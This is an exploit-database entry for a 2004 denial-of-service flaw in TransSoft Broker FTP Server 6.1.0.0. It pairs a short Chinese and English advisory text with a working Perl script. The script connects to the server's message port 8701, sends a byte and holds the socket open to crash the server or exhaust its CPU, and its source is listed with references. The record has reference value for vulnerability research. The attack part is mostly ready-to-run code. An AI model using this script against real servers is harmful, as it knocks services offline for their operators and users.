https://www.exploit-db.com/exploits/23715
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-103

BrokerFTP是一款FTP服务程序。BrokerFTP对部分不正常连接缺少正确处理，远程攻击者可以利用这个漏洞进行拒绝服务攻击。通过连接FTP服务程序的消息服务程序(默认8701口)然后马上断开，可导致TsFtpSrv.exe程序发生异常。另外通过连接服务程序，不发送任何数据，但保持连接打开，就可以使TsFtpSrv.exe消耗大量CPU时间，而造成拒绝服务。

source: http://www.securityfocus.com/bid/9680/info

It has been reported that Broker FTP Server may be prone to multiple denial of service vulnerabilities. These issues may allow a remote attacker to cause the software to crash or hang.

Broker FTP Server version 6.1.0.0 has been reported to be prone to these issues, however, other versions may be affected as well.

#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#

use Socket;
if (not $ARGV[0]) {
? ? ? ? print qq~
? ? ? ? ? ? ? ? Usage: pfdos.pl < host>
? ? ? ? ~;
exit;}

$ip=$ARGV[0];
print "host: " . $ip . "nn";
sendexplt("A");
sub sendexplt {
?my ($pstr)=@_;
? ? ? ? $target= inet_aton($ip) || die("inet_aton
problems");
?socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
?die("Socket problemsn");
?if(connect(S,pack "SnA4x8",2,8701,$target)){
?select(S);
? ? ? ? ? ? ? ? $|=1;
?print $pstr;
?sleep 100;
? ? ? ? ?close(S);
?} else { die("Can't connect...n"); }
}

来源:XF
名称:broker-ftp-tsftpsrv-dos(15242)
链接:http://xforce.iss.net/xforce/xfdb/15242
来源:BID
名称:9680
链接:http://www.securityfocus.com/bid/9680
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
来源:BUGTRAQ
名称:20040217BrokerFTPDoS(MessageServer)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107705346817241&w;=2